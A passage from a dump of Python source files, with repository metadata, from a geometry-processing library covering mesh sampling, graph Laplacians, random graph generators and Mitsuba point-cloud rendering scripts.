'''\n\n if not lu.is_symmetric(A):\n raise ValueError('Laplacian implemented only for square and symmetric adjacency matrices.')\n\n n = A.shape[1]\n total_weight = A.sum(axis=1).squeeze()\n D = sparse.spdiags(total_weight, 0, n, n)\n\n if laplacian_type == 'comb':\n L = -A + D\n elif laplacian_type == 'norm':\n total_weight = (1 / np.sqrt(total_weight)).squeeze()\n Dn = sparse.spdiags(total_weight, 0, n, n)\n L = Dn.dot(-A + D).dot(Dn)\n elif laplacian_type == 'sign':\n L = A + D\n else:\n raise ValueError('Please provide a valid argument for the type of laplacian.')\n return L\n\nif __name__ == '__main__':\n from geo_tool.solids import mesh_cleaning as cleaning\n from geo_tool.solids.mesh import Mesh\n\n off_file = '/Users/t_achlp/Documents/DATA/ModelNet10/OFF_Original/bathtub/train/bathtub_0001.off'\n in_mesh = Mesh(off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n\n cloud_points, face_ids = in_mesh.sample_faces(2000)\n from scipy import spatial\n tree = spatial.KDTree(cloud_points, leafsize=100)\n weights, neighbors = tree.query(cloud_points, 10)\n weights = weights[:, 1:]\n neighbors = neighbors[:, 1:]\n weights = np.exp(- weights**2 / (2 * np.median(weights)))\n A = Graph.knn_to_adjacency(neighbors, weights)\n"
},
{
"alpha_fraction": 0.5632364749908447,
"alphanum_fraction": 0.5777690410614014,
"avg_line_length": 38.16923141479492,
"blob_id": "a5e7b628255598d64fa3c2027ad2805064271789",
"content_id": "574866f65efba84933e3cb86b60b28a74f1e31df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2546,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 65,
"path": "/solids/legacy_code.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Feb 14, 2018\n\n@author: optas\n'''\n\n# soligs.Mesh\ndef sample_faces(self, n_samples, at_least_one=True, seed=None):\n \"\"\"Generates a point cloud representing the surface of the mesh by sampling points\n proportionally to the area of each face.\n\n Args:\n n_samples (int) : number of points to be sampled in total\n at_least_one (int): Each face will have at least one sample point (TODO: broken fix)\n Returns:\n numpy array (n_samples, 3) containing the [x,y,z] coordinates of the samples.\n\n Reference :\n http://chrischoy.github.in_out/research/barycentric-coordinate-for-mesh-sampling/\n [1] Barycentric coordinate system\n\n \\begin{align}\n P = (1 - \\sqrt{r_1})A + \\sqrt{r_1} (1 - r_2) B + \\sqrt{r_1} r_2 C\n \\end{align}\n \"\"\"\n\n face_areas = self.area_of_triangles()\n face_areas = face_areas / np.sum(face_areas)\n\n n_samples_per_face = np.round(n_samples * face_areas)\n\n if at_least_one:\n n_samples_per_face[n_samples_per_face == 0] = 1\n\n n_samples_per_face = n_samples_per_face.astype(np.int)\n n_samples_s = int(np.sum(n_samples_per_face))\n\n if seed is not None:\n np.random.seed(seed)\n\n # Control for float truncation (breaks the area analogy sampling)\n diff = n_samples_s - n_samples\n indices = np.arange(self.num_triangles)\n if diff > 0: # we have a surplus.\n rand_faces = np.random.choice(indices[n_samples_per_face >= 1], abs(diff), replace=False)\n n_samples_per_face[rand_faces] = n_samples_per_face[rand_faces] - 1\n elif diff < 0:\n rand_faces = np.random.choice(indices, abs(diff), replace=False)\n n_samples_per_face[rand_faces] = n_samples_per_face[rand_faces] + 1\n\n # Create a vector that contains the face indices\n sample_face_idx = np.zeros((n_samples, ), dtype=int)\n\n acc = 0\n for face_idx, _n_sample in enumerate(n_samples_per_face):\n sample_face_idx[acc: acc + _n_sample] = face_idx\n acc += _n_sample\n\n r = np.random.rand(n_samples, 2)\n A = self.vertices[self.triangles[sample_face_idx, 0], :]\n B = self.vertices[self.triangles[sample_face_idx, 1], :]\n C = self.vertices[self.triangles[sample_face_idx, 2], :]\n P = (1 - np.sqrt(r[:, 0:1])) * A + np.sqrt(r[:, 0:1]) * (1 - r[:, 1:]) * B + \\\n np.sqrt(r[:, 0:1]) * r[:, 1:] * C\n return P, sample_face_idx\n"
},
{
"alpha_fraction": 0.6279229521751404,
"alphanum_fraction": 0.645116925239563,
"avg_line_length": 33.630950927734375,
"blob_id": "7cc478c4691955b5c931da1eecaa59d433042dd9",
"content_id": "471ea8374c46a987ea968b17dba08b43ce142357",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2908,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 84,
"path": "/private/scratch.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016.\nDirty scripts checking geo_tool functionality \n\n@author: Panayotes Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n \n \n\n\nimport sys\nimport numpy as np\nimport os.path as osp\nfrom scipy import spatial\n\ngit_path = '/Users/optas/Documents/Git_Repos/'\nsys.path.insert(0, git_path)\n\nfrom geo_tool import Mesh, Graph, Point_Cloud, Laplace_Beltrami\nimport geo_tool.solids.mesh_cleaning as cleaning\nimport geo_tool.signatures.node_signatures as ns\nimport geo_tool.in_out.soup as gio\n\n############################################################\n## TODO: check ravel() vs. np.repeat (used in geo_tool)\n## \n## \n############################################################ \n\ndef main_Mesh(): \n off_file = '/Users/optas/DATA/Shapes/Model_Net_10/OFF_Original/bathtub/train/bathtub_0001.off'\n \n in_mesh = Mesh(off_file=off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=True)\n \n in_lb = Laplace_Beltrami(in_mesh)\n n_cc, node_labels = in_mesh.connected_components()\n parts_id = Graph.largest_connected_components_at_thres(node_labels, 1)\n print 'Number of connected components = %d.' % (n_cc)\n\n percent_of_eigs = 1\n min_eigs = None\n max_eigs = None\n min_vertices = None\n time_horizon = 10\n area_type = 'barycentric'\n\n v_color = ns.hks_of_component_spectra(in_mesh, in_lb, area_type, percent_of_eigs, \\\n time_horizon, min_vertices, min_eigs, max_eigs)[0]\n\n in_mesh.plot(vertex_function=v_color)\n\n\ndef main_Point_Cloud_Saliency():\n ply_file = '/Users/optas/Documents/Git_Repos/autopredictors/point_cloud_saliency/test_data/dragon_heavily_sub_sampled.ply'\n from autopredictors import point_cloud_saliency\n \n \ndef main_Point_Cloud():\n ply_file = '/Users/optas/Documents/Git_Repos/autopredictors/point_cloud_saliency/test_data/airplane.ply'\n cloud = Point_Cloud(ply_file=ply_file)\n print cloud\n\ndef main_Point_Cloud_Annotations(): \n class_id = '02958343'\n model_id = '1a0c91c02ef35fbe68f60a737d94994a' \n# anno_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/points_label/wheel/' + model_id + '.seg'\n anno_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/expert_verified/points_label/' + model_id + '.seg'\n pts_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/points/' + model_id + '.pts'\n points = gio.load_crude_point_cloud(pts_file)\n anno = gio.load_annotation_of_points(anno_file)\n point_cloud = Point_Cloud(points = points)\n point_cloud.plot(c=anno)\n \n\nif __name__ == '__main__':\n# main_Mesh()\n# main_Point_Cloud()\n# main_Point_Cloud_Saliency()\n main_Point_Cloud_Annotations()"
},
{
"alpha_fraction": 0.5804196000099182,
"alphanum_fraction": 0.5874125957489014,
"avg_line_length": 26.0222225189209,
"blob_id": "5986ef2b1e0c69f76d1c4980cb061e540d3d13c2",
"content_id": "ff90b9e0ac6dff18288589e2823ab8632d65890c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2431,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 90,
"path": "/utils/graph_generators.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 26, 2017\n\n@author: optas\nTODO: Merge/ re-factor (fundamentals/graph + graph_roles)\nPRELIMINARY CODE - not used/debugged yet. \n\n'''\n\nimport numpy as np\nimport random\n\nfrom scipy.sparse import coo_matrix\n\n\ndef adjacency_from_edges(edges, n_nodes, sparse=True, dtype=np.int32):\n source_e = np.array([i[0] for i in edges])\n target_e = np.array([i[1] for i in edges])\n vals = np.ones_like(source_e, dtype=dtype)\n if sparse:\n res = coo_matrix((vals, (source_e, target_e)), shape=(n_nodes, n_nodes), dtype=dtype)\n else:\n raise NotImplementedError()\n return res\n\n\ndef gnm_random_graph(n, m, seed=None, directed=False):\n \"\"\"Returns a `G_{n,m}` random graph.\n\n In the `G_{n,m}` model, a graph is chosen uniformly at random from the set\n of all graphs with `n` nodes and `m` edges.\n\n This algorithm should be faster than :func:`dense_gnm_random_graph` for\n sparse graphs.\n\n Parameters\n ----------\n n : int\n The number of nodes.\n m : int\n The number of edges.\n seed : int, optional\n Seed for random number generator (default=None).\n directed : bool, optional (default=False)\n If True return a directed graph\n\n See also\n --------\n dense_gnm_random_graph\n\n \"\"\"\n max_edges = n * (n - 1)\n if not directed:\n max_edges /= 2.0\n if m >= max_edges:\n raise ValueError('Too many edges.')\n\n nlist = np.arange(n)\n edge_count = 0\n edges = set()\n while edge_count < m:\n # generate random edge u,v\n u = random.choice(nlist)\n v = random.choice(nlist)\n if u == v or (u, v) in edges:\n continue\n else:\n edges.add((u, v))\n if not directed:\n edges.add((v, u))\n edge_count += 1\n\n return adjacency_from_edges(edges, n)\n\n\ndef SBM_from_class_labels(vertex_labels, p_matrix):\n 'stochastic block model'\n n_vertices = len(vertex_labels)\n adjacency = np.zeros(shape=(n_vertices, n_vertices), dtype=np.bool)\n for row, _row in enumerate(adjacency):\n for col, _col in enumerate(adjacency[row]):\n community_a = vertex_labels[row]\n community_b = vertex_labels[col]\n p = random.random()\n val = p_matrix[community_a][community_b]\n\n if p <= val:\n adjacency[row][col] = 1\n adjacency[col][row] = 1\n return adjacency"
},
{
"alpha_fraction": 0.5429388284683228,
"alphanum_fraction": 0.5612751245498657,
"avg_line_length": 45.6274528503418,
"blob_id": "82874c886eb2063ae7b20bf80be0748b95b9d129",
"content_id": "8cecdcbfe711d23828a60d3cec069658c9d6c088",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11889,
"license_type": "permissive",
"max_line_length": 193,
"num_lines": 255,
"path": "/rendering/mitsuba_rendering.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "__author__ = \"Panos Achlioptas, Lin Shao, 2017.\"\n\nimport os\nimport numpy as np\nimport shutil\nimport os.path as osp\nimport matplotlib.pyplot as plt\n\nfrom geo_tool.in_out.soup import load_wavefront_obj, load_ply\nfrom geo_tool import Point_Cloud\n\nfrom general_tools.in_out import create_dir\nfrom general_tools.strings import trim_content_after_last_dot\nfrom general_tools.plotting.colors import rgb_to_hex_string\n\n\nclass Mitsuba_Rendering(object):\n\n def __init__(self, command_file, model_list, img_out_dir, temp_dir, dependencies_dir, clean_temp=False):\n ''' Initializer of Class instance.\n Input:\n command_file : file_name where the commands calling Mitsuba will be written.\n model_list: a list containing the file_names of the models that will be rendered.\n img_out_dir: where the rendered files will be saved.\n temp_dir : Mitsuba will store here intermediate results.\n dependencies_dir: holds files like: envmap.exr, matpreview.serialized that are necessary for rendering.\n clean_temp: if True, post rendering all intermediate results will be deleted.\n\n Assumes Mitsuba is installed and can be accessed in a terminal with 'mitsuba'. Similarly, 'mtsutil' can be called from the command line.\n '''\n\n self.command_file = command_file\n self.img_out_dir = img_out_dir\n self.temp_dir = temp_dir\n self.model_list = model_list\n self.clean_temp = clean_temp\n self.set_default_rendering_params()\n\n create_dir(self.temp_dir)\n create_dir(self.img_out_dir)\n shutil.copy(os.path.join(dependencies_dir, 'envmap.exr'), self.temp_dir)\n shutil.copy(os.path.join(dependencies_dir, 'matpreview.serialized'), self.temp_dir)\n\n def set_default_rendering_params(self):\n self.sphere_radius = 0.015 # Size of rendered sphere (of point-clouds).\n self.ldsampler_n_samples = 128 # Controls the quality of the rendering, higher is better.\n\n self.z_rot_degrees = 0 # Rotate object along z-axis before render it.\n\n self.backdrop_size = 10 # Backdrop is the white cloth put in professional photo-shooting as background.\n self.backdrop_x_pos = 0\n self.backdrop_y_pos = 5\n self.backdrop_z_pos = 0 # This is relative and it will be added to the minimum point of the physical object that is rendered to\n # decide the z position of the backdrop.\n\n self.sensor_origin = [0, -2.5, 0.5] # Where is the sensor/camera being placed in [x,y,z] space.\n self.sensor_target = [0, 0, 0] # Where the sensor is pointed to.\n self.sensor_up = [0, 0, 1]\n self.sensor_focus_distance = 2.3173\n\n self.sensor_height = 480 # img_out dimensions\n self.sensor_width = 480\n\n def pc_loader(self, file_name, normalize=True, load_color=False):\n if file_name[-4:] == '.ply':\n if load_color:\n points, color = load_ply(file_name, with_color=True)\n pc = Point_Cloud(points)\n else:\n pc = Point_Cloud(ply_file=file_name)\n color = None\n\n if normalize:\n pc.center_in_unit_sphere()\n pc.rotate_z_axis_by_degrees(self.z_rot_degrees, clockwise=False)\n\n return pc, color\n\n def generate_commands_for_point_cloud_rendering(self, color_per_point=False):\n command = ''\n for model_file in self.model_list:\n pcloud, colors = self.pc_loader(model_file, load_color=color_per_point)\n pc_z_min = np.min(pcloud.points[:, 2])\n\n model_name = trim_content_after_last_dot(osp.basename(model_file))\n xml_file = os.path.join(self.temp_dir, model_name + '.xml')\n\n with open(xml_file, 'w') as xml_out:\n xml_out.write(self.xml_string(pc_z_min))\n if colors is not None:\n for i, point in enumerate(pcloud.points):\n 
xml_out.write(self.xml_point_string(self.sphere_radius, point, colors[i]))\n else:\n for point in pcloud.points:\n xml_out.write(self.xml_point_string(self.sphere_radius, point))\n\n xml_out.write(self.xml_closure())\n\n img_file = os.path.join(self.img_out_dir, model_name + '.png')\n exr_file = os.path.join(self.temp_dir, model_name + '.exr')\n\n command += 'mitsuba %s\\n' % xml_file\n command += 'mtsutil tonemap -o %s %s\\n\\n' % (img_file, exr_file)\n\n with open(self.command_file, 'w') as fout:\n fout.write(command)\n if self.clean_temp:\n command = 'rm mitsuba*.log\\n'\n# command += 'rm -rf %s\\n' % (self.temp_dir, )\n fout.write(command)\n\n try:\n os.system(\"chmod +x %s\" % (self.command_file, ))\n except:\n pass\n\n def xml_string(self, pc_z_min):\n return self.xml_preamble() + self.xml_sensor() + self.xml_emitter() + self.xml_backdrop(pc_z_min)\n\n def xml_point_string(self, sphere_radius, position, color=None):\n if color is not None:\n r, g, b = color\n color_value = rgb_to_hex_string(r, g, b)\n else:\n color_value = '#6d7185'\n\n out_str = '<shape type=\"sphere\">\\n'\n out_str += '\\t<float name=\"radius\" value=\"%f\"/>\\n' % (sphere_radius, )\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (position[0], position[1], position[2])\n out_str += '\\t</transform>\\n'\n out_str += '\\t<bsdf type=\"diffuse\">\\n'\n out_str += '\\t\\t<srgb name=\"diffuseReflectance\" value=\"%s\"/>\\n' % (color_value, )\n out_str += '\\t</bsdf>\\n'\n out_str += '</shape>\\n\\n'\n\n return out_str\n\n def xml_preamble(self):\n out_str = '<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n\\n'\n out_str += '<scene version=\"0.5.0\">\\n'\n out_str += '\\t<!--Setup scene integrator -->\\n'\n out_str += '\\t<integrator type=\"path\">\\n'\n out_str += '\\t\\t<!-- Path trace with a max. 
path length of 5 -->\\n'\n out_str += '\\t\\t<integer name=\"maxDepth\" value=\"5\"/>\\n'\n out_str += '\\t</integrator>\\n\\n'\n return out_str\n\n def xml_sensor(self):\n out_str = '<sensor type=\"perspective\">\\n'\n out_str += '\\t<float name=\"focusDistance\" value=\"%f\"/>\\n' % self.sensor_focus_distance\n out_str += '\\t<float name=\"fov\" value=\"45\"/>\\n'\n out_str += '\\t<string name=\"fovAxis\" value=\"x\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n\n out_str += '\\t\\t<lookat target=\"%f, %f, %f\" origin=\"%f, %f, %f\" up=\"%f, %f, %f\"/>\\n' \\\n % (self.sensor_target[0], self.sensor_target[1], self.sensor_target[2], self.sensor_origin[0], \\\n self.sensor_origin[1], self.sensor_origin[2], self.sensor_up[0], self.sensor_up[1], self.sensor_up[2])\n\n out_str += '\\t</transform>\\n'\n out_str += '\\t<sampler type=\"ldsampler\">\\n'\n out_str += '\\t\\t<integer name=\"sampleCount\" value=\"%d\"/>\\n' % self.ldsampler_n_samples\n out_str += '\\t</sampler>\\n'\n out_str += '\\t<film type=\"hdrfilm\">\\n'\n out_str += '\\t\\t<integer name=\"height\" value=\"%i\"/>\\n' % self.sensor_height\n out_str += '\\t\\t<integer name=\"width\" value=\"%i\"/>\\n' % self.sensor_width\n out_str += '\\t\\t<rfilter type=\"gaussian\"/>\\n'\n out_str += '\\t</film>\\n'\n out_str += '</sensor>\\n\\n'\n return out_str\n\n def xml_emitter(self):\n out_str = '<emitter type=\"envmap\" id=\"Area_002-light\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"envmap.exr\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<rotate y=\"1\" angle=\"-180\"/>\\n'\n out_str += '\\t\\t<matrix value=\"-0.224951 -0.000001 -0.974370 0.000000 -0.974370 0.000000 0.224951 0.000000 0.000000 1.000000 -0.000001 8.870000 0.000000 0.000000 0.000000 1.000000\"/>\\n'\n out_str += '\\t</transform>\\n'\n out_str += '\\t<float name=\"scale\" value=\"3\"/>\\n'\n out_str += '</emitter>\\n\\n'\n return out_str\n\n def xml_obj(self, obj_filename, position=[0, 0, 0]):\n out_str = '<shape type=\"obj\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"%s\"/>\\n' % obj_filename\n out_str += '\\t<transform name=\"toWorld\" >\\n'\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (position[0], position[1], position[2])\n out_str += '\\t</transform >\\n'\n out_str += '\\t<bsdf type=\"diffuse\" >\\n'\n out_str += '\\t\\t<srgb name=\"diffuseReflectance\" value=\"#6d7185\"/>\\n'\n out_str += '\\t</bsdf>\\n'\n out_str += '</shape>\\n'\n return out_str\n\n def xml_backdrop(self, pc_z_min):\n ''' backdrop is the white colored cloth that is used when photo-shooting and acts like the background.\n In Mitsuba we add such an object along with our object of interest to help rendering the latter.\n '''\n out_str = '<texture type=\"checkerboard\" id=\"__planetex\">\\n'\n out_str += '\\t<rgb name=\"color0\" value=\"0.9\"/>\\n'\n out_str += '\\t<rgb name=\"color1\" value=\"0.9\"/>\\n'\n out_str += '\\t<float name=\"uscale\" value=\"8.0\"/>\\n'\n out_str += '\\t<float name=\"vscale\" value=\"8.0\"/>\\n'\n out_str += '\\t<float name=\"uoffset\" value=\"0.0\"/>\\n'\n out_str += '\\t<float name=\"voffset\" value=\"0.0\"/>\\n'\n out_str += '</texture>\\n\\n'\n\n out_str += '<bsdf type=\"diffuse\" id=\"__planemat\">\\n'\n out_str += '\\t<ref name=\"reflectance\" id=\"__planetex\"/>\\n'\n out_str += '</bsdf>\\n\\n'\n\n out_str += '<shape type=\"serialized\" id=\"Plane-mesh_0\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"matpreview.serialized\"/>\\n'\n out_str += '\\t<integer 
name=\"shapeIndex\" value=\"0\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<scale x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (self.backdrop_size, self.backdrop_size, self.backdrop_size)\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\" />\\n' % (self.backdrop_x_pos, self.backdrop_y_pos, self.backdrop_z_pos + pc_z_min)\n out_str += '\\t</transform>\\n'\n out_str += '\\t<ref name=\"bsdf\" id=\"__planemat\"/>\\n'\n out_str += '</shape>\\n\\n'\n return out_str\n\n def xml_closure(self):\n return '</scene>\\n'\n\n\n# def obj_commands(self):\n# self.num_commands = len(self.model_list)\n# fw_command = open(os.path.join(self.command_dir, 'command.sh'), 'w')\n# for i in xrange(self.num_commands):\n# obj_filename = os.path.join(self.model_list, self.model_list[i] + self.file_extension)\n# points, faces = self.obj_loader(obj_filename)\n# points = points.dot(self.rotation_mat().transpose())\n# xml_path = os.path.join(self.temp_dir, self.model_list[i]+'.xml')\n# exr_path = os.path.join(self.temp_dir, self.model_list[i]+'.exr')\n# img_path = os.path.join(self.img_out_dir, self.model_list[i]+'.png')\n# fw_exr = open(exr_path,'w')\n# fw_exr.close()\n# fw_xml = open(xml_path, 'w')\n# fw_xml.write(self.xml_string(-0.5))\n# fw_xml.write(self.xml_obj(obj_filename))\n# fw_xml.write(self.xml_post())\n# fw_xml.close()\n# command = 'mitsuba %s\\n' % xml_path\n# command += 'mtsutil tonemap -o %s %s\\n' % (img_path, exr_path)\n# fw_command.write(command)\n# fw_command.close(\n\n\n# def obj_loader(self, file_name):\n# vertices, faces, normals = load_wavefront_obj(file_name)\n# v_np = np.zeros((len(vertices),3))\n# for i in xrange(len(vertices)):\n# v_np[i,:] = vertices[i]\n# return v_np, faces"
},
{
"alpha_fraction": 0.6813746094703674,
"alphanum_fraction": 0.6907085180282593,
"avg_line_length": 31.28767204284668,
"blob_id": "60d4085ceba6366aa8ec6154a982dc184327612b",
"content_id": "6cae041c75815c4e05e67f78f78991af6c452522",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2357,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 73,
"path": "/scripts/extract_intrinsic_color.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 15, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport sys\nimport os.path as osp\nimport matplotlib.pyplot as plt\n\n\nfrom nn_saliency.src.mesh import Mesh\nfrom nn_saliency.src.laplace_beltrami import Laplace_Beltrami\nfrom nn_saliency.src.back_tracer import Back_Tracer\nimport nn_saliency.src.nn_io as nn_io\nimport nn_saliency.src.mesh_cleaning as cleaning\nfrom multiprocessing import Pool\nfrom subprocess import call as sys_call\n\npercent_of_eigs = 0.15\nmin_eigs = 7\nmax_eigs = 500\ntime_horizon = 20\nmin_vertices = 7\n\ncmap = plt.get_cmap('jet')\n\nglobal top_in_dir\nglobal out_dir\nfythumb_bin = '/home/panos/Renderer/a/b/fythumb_mvcnn/build/fythumb'\n\n\ndef render_views_with_fythumb(mesh_file, output_dir):\n sys_call([fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])\n\n\ndef extract_hks_color(off_file):\n in_mesh = Mesh(off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n in_lb = Laplace_Beltrami(in_mesh)\n v_color = in_mesh.color_via_hks_of_component_spectra(in_lb, percent_of_eigs, time_horizon, min_vertices, min_eigs, max_eigs)\n v_color = in_mesh.adjacency_matrix().dot(v_color)\n v_color = cmap(v_color)\n out_file = off_file.replace(top_in_dir, out_dir)\n nn_io.write_off(out_file, in_mesh.vertices, in_mesh.triangles, vertex_color=v_color)\n\n\ndef extract_parts_color(off_file):\n in_mesh = Mesh(off_file)\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n _, node_labels = in_mesh.connected_components()\n v_color = cmap(node_labels)\n out_file = off_file.replace(top_in_dir, out_dir)\n nn_io.write_off(out_file, in_mesh.vertices, in_mesh.triangles, vertex_color=v_color)\n views_out_dir = off_file.replace(top_in_dir, out_dir)[:-4]\n render_views_with_fythumb(out_file, views_out_dir)\n\nif __name__ == '__main__':\n top_in_dir = osp.abspath(sys.argv[1])\n out_dir = osp.abspath(sys.argv[2])\n nn_io.copy_folder_structure(top_in_dir, out_dir)\n off_files = nn_io.files_in_subdirs(top_in_dir, '\\.off$')\n\n pool = Pool(processes=6)\n for i, off_file in enumerate(off_files):\n print off_file\n pool.apply_async(extract_parts_color, args=(off_file,))\n pool.close()\n pool.join()\n"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.7924528121948242,
"avg_line_length": 26,
"blob_id": "7221fc1cc7e31b0207312ccd6bee44d9498d94d1",
"content_id": "2e5adddee0aaf275705b2c4a6e7bc8ace2af3bf0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 2,
"path": "/fundamentals/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . graph import Graph\nfrom . cuboid import Cuboid"
},
{
"alpha_fraction": 0.5433287620544434,
"alphanum_fraction": 0.5478482842445374,
"avg_line_length": 38.7578125,
"blob_id": "b85626a327849382a4b071f5648f1962d6a4c84b",
"content_id": "a52eb2cb57aa2acd87d40d515285a68b26a09fd6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5089,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 128,
"path": "/rendering/view_gradients.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes. \n'''\nimport cv2\nimport copy\nimport os.path as osp\nimport numpy as np\nimport matplotlib.pylab as plt\n\nfrom . collections import defaultdict\nfrom . shape_views import Shape_Views\nfrom . back_tracer import Back_Tracer\nfrom .. in_out import soup as nn_io\nfrom .. mesh import Mesh\n\n\nclass View_Gradients(object):\n '''\n classdocs\n '''\n def __init__(self, shape_views, grad_file):\n '''\n Constructor\n '''\n self.shape_views = shape_views\n self.grads = np.squeeze(np.load(grad_file)['arr_0'])\n \n if self.shape_views.num_views() != self.size(): # gradients is a tensor whose first dim==nun_views\n raise ValueError\n \n def size(self):\n return self.grads.shape[0]\n \n def __iter__(self):\n return self.grads.__iter__()\n \n def __next__(self):\n return self.grads.__next__()\n \n def camera_position(self, grad_id):\n return self.shape_views.cam_pos[grad_id]\n \n def resize(self, new_size):\n new_grads = np.empty(shape=((self.size(),) + new_size), dtype=self.grads.dtype) \n for i, old_grad in enumerate(self):\n new_grads[i] = cv2.resize(old_grad, new_size) \n self.grads = new_grads\n \n def clean_grad_outside_shape_mask(self, inline=True):\n if inline:\n new_self = self \n else:\n new_self = self.copy() \n \n views_mask = new_self.shape_views.masks \n dims = views_mask.shape \n grad_mask_cleaned = new_self.grads.flatten() # TODO this is pointer, right?\n# mass_outside = sum(abs(grad_mask_cleaned[~views_mask.flatten()]))\n# mass_inside = sum(abs(grad_mask_cleaned[views_mask.flatten()]))\n# print mass_outside, mass_inside\n grad_mask_cleaned[views_mask.flatten()==0] = 0\n grad_mask_cleaned = np.reshape(grad_mask_cleaned, dims) \n new_self.grads = grad_mask_cleaned \n return new_self\n \n def transform_grads(self, transformer):\n new_grads = self.copy()\n new_grads.grads = transformer(new_grads.grads) \n return new_grads\n \n def plot_grad(self, vertex_id, twist_id):\n index = self.shape_views.inv_dict[(vertex_id, twist_id)]\n plt.imshow(self.grads[index,:,:])\n plt.show()\n \n def copy(self):\n new_self = copy.copy(self) # Shallow copy all attributes (grads and shape_views) \n new_self.grads = copy.deepcopy(self.grads) # Deep copy the grads. \n return new_self\n \n def push_on_triangles(self, bt):\n aggregates = np.zeros((bt.mesh.num_triangles, 1)) \n missed = defaultdict(list)\n triangles_hit = defaultdict(list) \n for i, g in enumerate(self):\n vertex_id, twist_id = self.camera_position(i)\n y_coord, x_coord = np.where(g != 0)\n if not bt.is_legit_view_and_twist(vertex_id, twist_id): \n raise ValueError('Back_Tracer and View_Gradients don\\'t agree on the set of views.') \n for x,y in zip(x_coord, y_coord):\n try:\n triangle = bt.from_2D_to_3D((x,y), vertex_id, twist_id)\n aggregates[triangle] += g[y, x]\n triangles_hit[(vertex_id, twist_id)].append((triangle))\n \n except: \n missed[(vertex_id, twist_id)].append((x,y)) \n return aggregates, triangles_hit, missed # TODO-Trim.\n \n def export_grads_to_txt(self, save_dir):\n '''\n Exports the grads attribute into .txt files. 
Each file corresponds to one view (vertex_id, twist_id)\n and lists every pixel where a gradient is positive into a separate line.\n '''\n nn_io.create_dir(save_dir)\n for i, grad in enumerate(self):\n y_coord, x_coord = np.where(grad)\n vertex_id, twist_id = self.camera_position(i) \n out_file = 'grads_' + str(vertex_id) + '_' + str(twist_id) + '.txt'\n out_file = osp.join(save_dir, out_file)\n nn_io.write_pixel_list_to_txt(x_coord, y_coord, out_file)\n \nif __name__ == '__main__':\n in_mesh = Mesh('../Data/Screw/screw.off')\n views = Shape_Views('../Data/Screw/Views', 'png')\n grads = View_Gradients(views, '../Data/Screw/raw_grads.npz') \n rendered_size = (256, 256)\n grads.resize(rendered_size)\n grads.clean_grad_outside_shape_mask()\n \n bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)\n saliency_scores = np.zeros((in_mesh.num_triangles, 1))\n\n in_mesh.plot(triangle_function=saliency_scores)\n"
},
{
"alpha_fraction": 0.5275957584381104,
"alphanum_fraction": 0.5549139380455017,
"avg_line_length": 43.14215850830078,
"blob_id": "a6103d73f67e9d15cb6d5220fe2b1ff7ab2eebb9",
"content_id": "681cb735c5e05cb8d90486b7c0064a77a0f9d8d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9005,
"license_type": "permissive",
